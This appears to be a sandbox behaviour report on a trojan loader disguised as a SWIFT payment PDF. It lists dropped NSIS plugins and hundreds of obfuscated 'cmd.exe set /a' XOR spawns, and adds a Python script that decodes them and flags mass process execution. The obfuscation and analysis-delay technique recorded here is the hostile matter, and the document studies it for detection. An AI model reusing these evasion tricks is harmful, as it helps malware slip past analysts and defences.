          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Windows\resources\0409\gashanens.iniJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_00404801
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 136_2_00404801
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll 9A1A5C6F598247BFA52624CD793B9EF4FB85863CC9DFD69EB7EF671CACC906C9
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: String function: 00402A07 appears 51 times
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
          Source: SWIFTCOPYMT1030000000_pdf.exe | Static PE information: invalid certificate
          Source: SWIFTCOPYMT1030000000_pdf.exe | Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
          Source: Nonaddicting.exe.136.dr | Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
          Source: SWIFTCOPYMT1030000000_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal96.troj.evad.winEXE@396/18@0/1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_004042C5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_00402036 CoCreateInstance,MultiByteToWideChar
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File created: C:\Users\user\udskriftskartotek
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1268
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsaF52.tmp
          Source: SWIFTCOPYMT1030000000_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: SWIFTCOPYMT1030000000_pdf.exe | ReversingLabs: Detection: 15%
          Source: SWIFTCOPYMT1030000000_pdf.exe | Virustotal: Detection: 36%
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File read: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
          Source: unknown | Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
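What the "Obfuscated command line found" and "Mass process execution to delay analysis" signatures are keying on is visible in the listing above: every cmd.exe child runs set /a "A^177", i.e. it XORs one constant with the key 177 and exits. Evaluated as cmd.exe would, the results are printable ASCII one byte per child process; the first eleven spawns (250, 244, 227, 255, 244, 253, 130, 131, 139, 139, 242) give "KERNEL32::C", and the later ones give fragments such as "eFileA(m r4" (gaps where the listing records only a conhost child). That text, together with the dropped System.dll and nsExec.dll NSIS plugins, is consistent with the loader building an NSIS System plugin call string a character at a time, while the hundreds of short-lived processes inflate the trace. The script below is an added example, not part of the Joe Sandbox report and not GuLoader's code: it parses "Process created" entries in the shape used on this page, recovers the XOR key, renders the decoded bytes, and applies a per-parent count threshold as the mass-spawn heuristic. The sample entries are rebuilt from the listing above, and the threshold value (10) is an assumption of the example, not the sandbox's.

```python
"""Decode and flag the cmd.exe 'set /a' spawns recorded in a sandbox process listing.

Added example for this report page (not the report's or the malware's code): each
cmd.exe /c set /a "A^B" child computes one integer; in this trace the results are
printable bytes of a string. We also count such children per parent as a heuristic
for mass process execution.
"""
import re
from collections import Counter

# Constructed input, rebuilt from the first eleven cmd.exe spawns in the listing above,
# with conhost.exe children and the WerFault.exe entry kept as noise the parser must skip.
PARENT = r'C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe'
CMD = r'C:\Windows\SysWOW64\cmd.exe'
CONHOST_LINE = (r'Source: C:\Windows\SysWOW64\cmd.exe | Process created: '
                r'C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1')
FIRST_ELEVEN = [250, 244, 227, 255, 244, 253, 130, 131, 139, 139, 242]  # left operands as listed

SAMPLE_REPORT_LINES = []
for left in FIRST_ELEVEN:
    SAMPLE_REPORT_LINES.append(f'Source: {PARENT} | Process created: {CMD} cmd.exe /c set /a "{left}^177"')
    SAMPLE_REPORT_LINES.append(CONHOST_LINE)
SAMPLE_REPORT_LINES.append(f'Source: {PARENT} | Process created: '
                           r'C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092')

# Accepts both "Source: X | Process created: Y" and the un-separated "Source: XProcess created: Y".
ENTRY_RE = re.compile(r'Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*(?P<child>.+)$')
SET_A_RE = re.compile(r'\bcmd\.exe\s+/c\s+set\s+/a\s+"(?P<expr>[^"]*)"', re.IGNORECASE)
XOR_RE = re.compile(r'^\s*(\d+)\s*\^\s*(\d+)\s*$')


def parse_spawns(lines):
    """Return (parent, child_cmdline) for every 'Process created' entry."""
    out = []
    for line in lines:
        m = ENTRY_RE.search(line)
        if m:
            out.append((m.group('parent'), m.group('child')))
    return out


def eval_set_a_xor(expr):
    """Evaluate the one expression shape seen in this trace, <int>^<int>, as cmd.exe's
    set /a does (32-bit XOR). Any other shape returns None rather than being guessed at."""
    m = XOR_RE.match(expr)
    if not m:
        return None
    return (int(m.group(1)) ^ int(m.group(2))) & 0xFFFFFFFF


def set_a_values(lines):
    """Per parent, the ordered values its cmd.exe 'set /a' children compute."""
    per_parent = {}
    for parent, child in parse_spawns(lines):
        m = SET_A_RE.search(child)
        if not m:
            continue  # conhost.exe, WerFault.exe, ...: not a set /a spawn
        value = eval_set_a_xor(m.group('expr'))
        if value is not None:
            per_parent.setdefault(parent, []).append(value)
    return per_parent


def as_text(values):
    """Render values as ASCII, '.' for anything outside the printable range."""
    return ''.join(chr(v) if 32 <= v < 127 else '.' for v in values)


def infer_xor_key(lines):
    """The constant right-hand operand (177 in this report) acts as the XOR key;
    return the most common one, or None if no set /a spawn was seen."""
    keys = Counter()
    for _, child in parse_spawns(lines):
        m = SET_A_RE.search(child)
        if m:
            x = XOR_RE.match(m.group('expr'))
            if x:
                keys[int(x.group(2))] += 1
    return keys.most_common(1)[0][0] if keys else None


def mass_set_a_parents(lines, threshold=10):
    """Heuristic for 'Mass process execution': parents with >= threshold set /a children.
    The threshold is this example's assumption, not the sandbox's."""
    return {p: len(v) for p, v in set_a_values(lines).items() if len(v) >= threshold}


if __name__ == '__main__':
    key = infer_xor_key(SAMPLE_REPORT_LINES)
    for parent, values in set_a_values(SAMPLE_REPORT_LINES).items():
        print(f'{parent}: key={key} bytes={values} text={as_text(values)!r}')
    print('flagged:', mass_set_a_parents(SAMPLE_REPORT_LINES))
```

Run against the whole listing rather than the eleven-entry sample, the decoded text has holes wherever the report shows a conhost child without its cmd.exe parent line, so treat the output as a partial string to be confirmed in a debugger or in the NSIS script, not as a complete IOC.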
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
